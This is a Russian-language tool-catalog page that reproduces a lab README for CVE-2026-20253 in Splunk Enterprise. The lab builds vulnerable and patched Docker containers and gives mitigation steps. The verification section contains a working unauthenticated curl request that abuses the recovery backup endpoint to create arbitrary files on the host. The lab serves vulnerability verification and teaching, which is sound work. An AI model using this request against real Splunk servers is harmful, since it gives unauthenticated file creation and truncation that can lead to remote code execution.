Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-20253 — POC для CVE-2026-20253 | Kitploit
Инструменты/GitHubGitHub/pssec-io/cve-2026-20253
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubpssec-io/cve-2026-20253

CVE-2026-20253

POC для CVE-2026-20253

Репозиторий
12 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-20253 — Лаборатория Pre-Auth RCE для Splunk Enterprise

Создание и усечение произвольных файлов без аутентификации через сайдкар PostgreSQL
CVSS 9.8 · Критическая · CWE-306 · Активно эксплуатируется (CISA KEV)


⚠️ Отказ от ответственности

Этот репозиторий предназначен строго для образовательных целей и авторизованных исследований безопасности.
Все тестирование должно проводиться только против инфраструктуры, которой вы владеете или на тестирование которой имеете явное письменное разрешение.
Авторы не несут ответственности за неправомерное использование продемонстрированных здесь методик или инструментов.
Никогда не запускайте это против производственных систем или сред, которыми вы не владеете.


Обзор

CVE-2026-20253 затрагивает Splunk Enterprise версий ниже 10.2.4 и 10.0.7.
Служба-сайдкар PostgreSQL, поставляемая в комплекте со Splunk, предоставляет две внутренние конечные точки HTTP:

root@kitploit:~
/v1/postgres/recovery/backup
/v1/postgres/recovery/restore

Обе конечные точки не имеют никакой проверки аутентификации (CWE-306), то есть любой злоумышленник с сетевым доступом может вызывать их без учётных данных. Передавая управляемый атакующим параметр backupFile, неаутентифицированный пользователь может создавать или усекать произвольные файлы в файловой системе хоста Splunk — примитив, который исследователи превратили в полноценное удалённое выполнение кода до аутентификации (Pre-Auth RCE).

Скачать инструмент
СвойствоОписание
CVECVE-2026-20253
Оценка CVSS9.8 (критическая)
CWECWE-306 — Отсутствие аутентификации для критически важной функции
Затронутые версииSplunk Enterprise 10.0.x < 10.0.7, 10.2.x < 10.2.4
Исправлено в10.0.7, 10.2.4
CISA KEVДобавлено 18 июня 2026 г.

Структура репозитория

root@kitploit:~
.
├── Dockerfile                  # Vulnerable image  (splunk 10.2.3)
├── docker-compose.yml          # Vulnerable container on port 8000
├── patched.Dockerfile          # Patched image     (splunk 10.2.4)
├── patched-docker-compose.yml  # Patched container on port 8001
└── instructions                # Quick command reference

Предварительные требования

  • Docker + Docker Compose v2
  • ~6 ГБ свободного места на диске (образ Splunk большой)
  • Kali Linux или любой Linux-хост с доступным curl

Использование

Запуск уязвимого экземпляра (порт 8000)

root@kitploit:~
docker compose -f docker-compose.yml up -d --build

Подождите ~90 секунд, пока Splunk полностью инициализируется. Следите за ходом с помощью:

root@kitploit:~
docker compose -f docker-compose.yml logs -f
# Ready when you see: "Ansible playbook complete"

Веб-интерфейс Splunk → http://localhost:8000
Учётные данные: admin / changeme


Запуск исправленного экземпляра (порт 8001)

root@kitploit:~
docker compose -f patched-docker-compose.yml up -d --build

Веб-интерфейс Splunk → http://localhost:8001
Учётные данные: admin / changeme

Оба контейнера могут работать одновременно — порты разнесены, чтобы избежать конфликтов.


Проверка

Проверка уязвимого экземпляра → ожидается HTTP 400

root@kitploit:~
curl -sk -X POST   "http://localhost:8000/en-US/splunkd/__raw/v1/postgres/recovery/backup"   -H "Authorization: Basic cHNzZWM6Cg=="   -d '{"database":"postgres","backupFile":"/tmp/poc"}'   -o /dev/null -w "HTTP Status: %{http_code}\n"

Ожидается: 400 — конечная точка существует, аутентификация не применялась, запрос был обработан.

Проверьте, что файл был создан внутри контейнера:

root@kitploit:~
docker exec splunk-cve-2026-20253 ls -la /tmp/poc

Проверка исправленного экземпляра → ожидается HTTP 401

root@kitploit:~
curl -sk -X POST   "http://localhost:8001/en-US/splunkd/__raw/v1/postgres/recovery/backup"   -H "Authorization: Basic cHNzZWM6Cg=="   -d '{"database":"postgres","backupFile":"/tmp/poc"}'   -o /dev/null -w "HTTP Status: %{http_code}\n"

Ожидается: 401 — теперь аутентификация обязательна, запрос отклонён.


Справочник кодов ответа

HTTP-статусЗначение
400Уязвим — конечная точка доступна, проверки аутентификации нет
401Исправлен — аутентификация обязательна
404Сайдкар отсутствует / неверный путь
000Контейнер ещё не готов

Необязательно: сканер watchTowr

Команда watchTowr Labs опубликовала скрипт обнаружения, который автоматизирует описанную выше проверку:

root@kitploit:~
git clone https://github.com/watchtowrlabs/watchTowr-vs-Splunk-CVE-2026-20253
cd watchTowr-vs-Splunk-CVE-2026-20253
pip3 install requests
python3 watchTowr-vs-Splunk-CVE-2026-20253.py --host 127.0.0.1 --port 8000

Остановка лаборатории

root@kitploit:~
# Stop vulnerable
docker compose -f docker-compose.yml down

# Stop patched
docker compose -f patched-docker-compose.yml down

Устранение уязвимости

Немедленно обновитесь до исправленной версии:

ВеткаИсправленная версия
10.2.x10.2.4
10.0.x10.0.7

Если вы не можете установить исправление немедленно, отключите сайдкар PostgreSQL, добавив следующее в server.conf, и перезапустите Splunk:

root@kitploit:~
[postgres]
disabled = true

⚠️ Не отключайте сайдкар, если вы используете Edge Processor или конвейеры данных SPL2 — он необходим для этих функций.


Ссылки

  • 🔴 Официальное уведомление Splunk — SVD-2026-0603
  • 🔬 Исследование и инструмент обнаружения watchTowr Labs — github.com/watchtowrlabs/watchTowr-vs-Splunk-CVE-2026-20253
  • 📋 Запись в каталоге CISA KEV — cisa.gov/known-exploited-vulnerabilities-catalog
  • 📰 Статья The Hacker News — Критическая уязвимость Splunk Enterprise позволяет атакующим выполнять код без аутентификации

Правовая информация

Данная лабораторная среда предоставляется только для оборонительных исследований в области безопасности и образовательных целей.
Несанкционированный доступ к компьютерным системам является незаконным согласно Закону о компьютерном мошенничестве и злоупотреблениях (CFAA), Закону Великобритании о неправомерном использовании компьютеров (Computer Misuse Act) и аналогичному законодательству по всему миру.
Используйте ответственно.